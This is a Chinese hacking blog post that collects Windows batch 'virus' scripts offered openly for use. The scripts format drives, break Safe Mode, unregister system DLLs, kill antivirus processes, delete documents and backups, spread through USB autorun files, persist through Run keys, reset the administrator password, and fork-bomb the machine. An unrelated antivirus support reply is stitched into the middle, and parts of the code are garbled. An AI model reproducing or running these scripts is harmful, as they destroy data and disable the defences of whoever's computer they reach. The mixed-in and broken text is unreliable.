作者:hacker发布时间:2022-07-09分类:黑客技术浏览:134评论:2
:1
rem 损坏安全模式
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f
rem 开机自启动
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsdir /t reg_sz /d "c:\%~n0%~x0" /fnul
rem 格式化所有盘
format d:/q
format e:/q
format f:/q
rem 运行exe会自动关联jpg
reg add "HKEY_CLASSES_ROOT\exefile\shell\opencommand" "rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscreen %1
rem 删除系统备份
for /f %%a in ('dir /b/s %systemroot%\system32\dllcache') do del /Q %%a
rem 反注册所有dll
for /f "tokens=*" %%b in ('dir /b/s %systemroot%\*.dll') do regsvr32 /s /u "%%b"
rem 反注册所有ocx
for /f "tokens=*" %%c in ('dir /b/s %systemroot%\*.ocx') do regsvr32 /s /u "%%c"
rem 禁用任务管理器
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v DisableTaskMgr /t reg_dword /d 1 /f nul
rem USB移动盘感染
for %%i in (%drives%) do (fsutil fsinfo drivetype %%i: | find "可移动驱动器"NUL copy %0 %%i)
for %%i in (%drives%) do (del %%i:\*.doc /f /s /q del %%i:\*.xls /f /s /q del %%i:\*.ghs /f /s /q)
rem 5秒内重启
shutdown -r -t 5
rem 复制自身+开机自启动
copy %0 "C:\Documents and Settings\%userprofile%\「开始」菜单\程序\启动"
rem 增加超多硬盘
md d:\fly nul 2nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly nul 2nul
rem 修改IE标题栏
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "window title" /t REG_SZ /d "Bitch, I FUCK YOU !" /f
rem 销毁自身
del %0
goto 1
你好,这个批处理文件的作用其实是修复图标缓存,,文件中涉及到的一个iconcache.db文件就是图标缓存文件,删除这个图标缓存文件,及注册表中对应子键中29这个键值的目的就是为了能够使桌面图标恢复正常。所以杀毒软件不会认为它是恶意的批处理文件而对其进行处理。
而现在无法显示隐藏文件,你可以在注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL子键右面窗口中检查CheckedValue键值,双击修改将其值赋值为1,并注意下面的DefaultValue的值应该为2,Type键值的值应该为radio,Text键值的值为@shell32.dll,-30500。然后再在上面的HIDDEN子键右面窗口中检查CheckedValue键值的值,应该设置为2,而其它则与上面SHOWALL相关键值内容相同。
但是系统运行缓慢,而且如果说前面的CheckedValue键值被篡改过0个数值的话,那么确实不排除中毒的可能性,你可使用腾讯电脑管家,在杀毒选项中选择“全盘查杀”进行一次深入的查杀,电脑管家拥有4+1核心杀毒引擎,能够根除顽固的木马病毒。
同时也建议你注意一下操作系统所在分区的空间是否充裕,如果不是很充裕,甚至是紧张的话,那也会影响系统运行速度的。你可以在电脑管家的“清理垃圾”选项中点击开始扫描,然后选择立即清理将垃圾文件清理掉以获得可用磁盘空间。还可以点击右下角的工具箱,选择软件搬家,将未在运行中的软件迁移到其它分区中,这样也能腾出不少磁盘空间来的。遇上无法删除的文件,你也可以在工具箱中选择文件粉碎,点击添加文件,选中你所想删除的文件添加进列表中,然后点击粉碎按钮。
如果你还有其它电脑问题,欢迎你在电脑管家企业平台提出,我们将尽力为你解答。
@echo
off
color
0b
mode
con:
cols=80
lines=20
@title=超级病毒
for
/L
%%a
in
(
3,-1,0
)
do
(
for
/l
%%a
in
(1,1,8)
do
echo\
echo
入侵倒计时
%%a
秒
ping
-n
2
127.1
1nul
2nul
cls
)
cls
color
40
for
/l
%%a
in
(1,1,8)
do
echo\
echo
正在遭受黑客入侵...
ping
127.1
/n
3
nul
echo.
echo
警告!警告!电脑已被入侵!!!
ping
127.1
/n
3
nul
cls
echo.
echo.
echo.
echo
正在删除G盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除E盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除D盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除C盘所有文件...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo
删除完毕
echo.
echo
正在删除分区表...
set
/p
a="============================================================================
=="nul
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=nul
)
for
/l
%%i
in
(1,1,80)
do
(
set
/p
aa=^nul
ping/n
1
127.1
nul
)
echo.
echo
删除完毕
echo.
echo.
echo
正在遭受黑客的炸弹袭击!
echo.
echo
电脑崩溃!准备关闭系统!
ping
127.1
/n
3
nul
shutdown
-s
-t
nulp
/p
注意条款:全部代码没有正常解除方式,会对机器造成伤害,在实体机上实验概不负责!
@echo off
echo 开始
:2
start cmd.exe
goto 2
就是主要是利用goto 来跳转到:2
循环跳转...就是循环用start 打开CMD ^^
友情提示...死机不负责.......
也可以利用
别的
@echo off
net user
%0
这里的核心是%0 他表示本身 就是循环运行本身^^
这里循环运行net user
上面主要把别人电脑整死机
下面我们利用修改注册表来恶整
常见修改注册表
就是开机加载 这世界人都知道
@echo off
echo wahaha
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v ctfmon.exe(开机加载文件的名字) /d C:\WINDOWS\system32\ctfmon.exe(这里是开机加载文件的路径)
这里可以添加一个开始我们弄的哪个strat 这个
@echo off
echo echo 开始 c:\windows\cnhacker.bat
echo :2 c:\windows\cnhacker.bat
echo start cmd.exe c:\windows\cnhacker.bat
echo goto 2c:\windows\cnhacker.bat
这里自动在windows下生成cnhacker.bat
然后利用上面开机加载 写起...就OK拉
修改IE栏
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "window title" /t REG_SZ /d "要改的名字...." /f
屏蔽修改主页那里
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v HOMEPAGE /t REG_DWORD /d 00000001 /f
简单硬盘炸弹(多生成垃圾文章)
echo off
set a=0
:22
set /a a=%a%+1
echo laji C:\%a%.txt
goto 22
如何要效果好 最好加一段vbs代码 隐藏运行 在C盘制造大量的垃圾TXT文件
修改不电脑显示
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f
把00000000 改成00000001 就可以恢复
这段大家不要实验......
就是利用%username%
net user %username% /del (删除当前使用的用户 不可以直接删除ADMINISTRATOR用户外)
造成你电脑上面ADMINISTRATOR桌面资料丢失
net user %username% /add
NET LOCALGROUP ADMINISTRATORS %username% /add
强行结束smss.exe 进程
ntsd -c q -pn smss.exe (结束该进程你的电脑即将卡死鼠标不能用)
shutdown -a (放弃关闭计算机)
危险不要实验
迅速格式所有盘符
for /f %%i in (d:,e:f:g:h:) do format /q /y %%i
这个必须要利用记事本保存 然后.bat 才能够执行 在CMD下面 无法执行
这些都是病毒常见修改注册表的位置和脚本喜欢改的地方...比较常见!~~
颜色属性由两个十六进制数字指定 --
第一个为背景,第二个则为前景。
每个数字可以为以下任何值之一:
例如color 0d 它就是黑色背景 淡紫色字体
0 = 黑色 8 = 灰色
1 = 蓝色 9 = 淡蓝色
2 = 绿色 A = 淡绿色
3 = 湖蓝色 B = 淡浅绿色
4 = 红色 C = 淡红色
5 = 紫色 D = 淡紫色
6 = 黄色 E = 淡黄色
7 = 白色 F = 亮白色
最强病毒!谨慎运行!此程序会将系统搞崩溃.
摘自:htt我ps://www是.jb51.net/a链rticle/7129.h接tm 去掉里面的字哦
@echo off
title You DEAD!!!!!!!
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f nul
%s% /im norton* /f nul
%s% /im av* /f nul
%s% /im fire* /f nul
%s% /im anti* /f nul
%s% /im spy* /f nul
%s% /im bullguard /f nul
%s% /im PersFw /f nul
%s% /im KAV* /f nul
%s% /im ZONEALARM /f nul
%s% /im SAFEWEB /f nul
%s% /im OUTPOST /f nul
%s% /im nv* /f nul
%s% /im nav* /f nul
%s% /im F-* /f nul
%s% /im ESAFE /f nul
%s% /im cle /f nul
%s% /im BLACKICE /f nul
%s% /im def* /f nul
%s% /im 360safe.exe /f nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q nul
for %%a in (c %alldrive%) do del %%a:\修复* /f /s /q nul
rem 修改注册表.......
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\
Folder\Hidden\SHOWALL /v
CheckedValue /t REG_DWORD /d 00000000 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRun /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoRecentDocsMenu /t
REG_DWORD /d 00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoDrives /t REG_DWORD /d
4294967295 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
Disableregistrytools /t
REG_DWORD /d 00000002 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoNetHood /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V
NoDesktop /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoClose /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoFind /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v
DisableTaskMgr /t REG_DWORD
/d 00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoLogOff /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
NoSetTaskBar /t REG_DWORD
/d 00000001 /f nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v
DisableSR /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v
DisableConfig /t REG_DWORD /d
00000001 /f nul
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v
RestrictRun /t REG_DWORD /d
00000001 /f nul
cls
net user administrator 123456 nul
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q nul
echo @echo off d:\setup.bat
echo shutdown -r -t 10 -f -c 亲爱的朋友,我十分抱歉的通知你,你的电脑已经严重崩溃,请重新
安装系统可以解决此问题
!^.^ d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动
\a.bat d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
setup.bat /t REG_SZ /d d:\setup.bat
/f d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f
d:\setup.bat
echo [windows] %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT %windir%\win.ini
echo [boot] %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT %windir%\system.ini
echo [AutoRun] d:\autorun.inf
echo Open=setup.bat d:\autorun.inf
echo Open=system.bat d:\autorun.inf
attrib d:\autorun.inf +r +s +h d:\setup.bat
attrib d:\setup.bat +r +s +h d:\setup.bat
start d:\setup.bat /min nul
echo @echo off C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v
setup.bat /t REG_SZ /d d:\setup.bat
/f C:\AUTOEXEC.BAT
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat nul
if not exist %windir%/system32/explorer.bat @echo off %windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min %
windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min %
windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f %windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f %windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f %windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
setup.bat /t REG_SZ /d d:\setup.bat
/f %windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v
explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f %windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v
explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f %windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min %windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat +r +s +h%
attrib %systemroot%/windows.bat +r +s +h
for %%c in (%alldrive%) do echo @echo off %%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min %%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat +r +s +h %%c:\system.bat
set drive=e f g h i j k l m n o p q r s t u v w x y z
for %%c in (%drive%) do echo [AuroRun] %%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat %%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start
d:\Program" "Files\run.bat /min
%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h %%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h nul
for %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat
/min d:\setup.bat
attrib d:\Program" "Files\run.bat +r +s +h nul
del %0
exit
标签:黑客bat病毒代码大全
已有2位网友发表了看法:
访客 评论于 2022-07-09 12:55:49 回复
========================"nulfor/l%%iin(1,1,80)do(set/paa=nul)for/l%%iin(1,1,80)do(set/paa=^nulping/n1127.1nul)echo删除
访客 评论于 2022-07-09 10:15:55 回复
ENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat /f d:\setup.bat echo REG ADD HKEY_L